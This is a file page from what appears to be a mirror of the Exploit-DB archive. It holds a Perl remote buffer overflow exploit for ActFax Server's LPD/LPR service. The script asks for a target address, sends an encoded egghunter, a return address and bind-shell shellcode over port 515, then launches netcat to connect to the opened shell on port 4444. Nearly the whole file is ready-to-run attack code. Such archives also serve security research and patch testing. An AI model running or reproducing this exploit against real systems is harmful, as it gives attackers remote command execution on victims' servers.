bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/16176.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

52 lines
No EOL
2 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl
# Exploit Title: ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit
# Date: Feb 15, 2011
# Author: chap0
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Version: Version 4.25, Build 0221 (2010-02-11)
# Tested on: Windows XP SP3 en
# Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
# Stay true my friends
print "\nActFax Server LPD/LPR Remote Buffer Overflow\n";
print " chap0 - www.seek-truth.net \n\n";
use IO::Socket;
print "Target Address Please: ";
chomp($target = <STDIN>);
my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '515', Proto => 'tcp');
print "Connecting. . .\n";
# egghunter EDI encoded
my $eggedi="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIrFOqZjyo4O1RPRrJwrShXMvNuluUBzBTJOoH2Wtpp0PtLKxzlorUYzlo2UHgKOKWA";
# ./msfpayload windows/shell_bind_tcp LPORT=4444
# alpha2 encoded aligned with edi
my $shellcode="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLyxniWpwpWpSPk9yuVQJr2DLKsb4pLKP".
"RvllKPR4TnksB18VoNWaZvFvQyotqKpnLwLSQSLuRVL5p9QZo4MS1kwKRJPQB67NkrrtPlKBb5l5Qn0NkcpQhK5kpt4BjWqXPPP".
"LKsxdXlKpX7Ps1jsjC5lg9lKdtlKS1N6uaKOvQyPllo1hOTM5QYWEhKPQel46c3M8x7KSMetpuKRpXlKshQ4GqkccVLK6lPKLK0".
"XUL7qN3lKGtlK31jpLIpDEtUt1KSkCQPY0ZpQKOypshaO2zLKTRJKNf1MQx7CWBUPwpaxt7rSebaOSdphpLPwDfUWkOXUx8npwq".
"uPWp7Yo4cdPPrH5ymPbKWpKOJupPrpbp2p70pPcppPaxxjvoyOKPYoYEmYO7VQkkpSphUReP4QqLoyxf1zFpPVsgcXkrIKVWPgK".
"O8Uccv7rHMgYydx9o9oJubsrs2wbHD4Xl7Km1KOXU67OyZgU81eRN2mU1KOJuRHpcpmU4GpOykS2wv7qGdqHvsZgbV9SfIrKMqv".
"jgW4TdWLEQUQLMstWTvpo6ePw42tpPrvqF1FG6PVrnSfV6pS2vsXqizlUoovkOHUmYkPpNRvQVIotpph7xmWwmSPKON5oKJPH5M".
"rSfu8LfmEMmmMKOiEgL363LgzMPkKkPsEWumk0G230rporJEPPSKOHUgzA";
my $payload1 = "A" . $eggedi . "\x7D" x (256-length($eggedi));
my $addy = "\x7D\x4B\x4A\x00" ;# --> pop EDI/ pop ESI/ pop EBP/ pop EBX/ pop ECX/ retn
my $payload2 = "w00tw00t" . $shellcode;
my $payloads = $payload1.$addy.$payload2;
print $sock $payloads;
print "DONE shell in a moment. . .\n";
$connect = "nc -vvn $target 4444";
system $connect
Reference in a new issue View git blame Copy permalink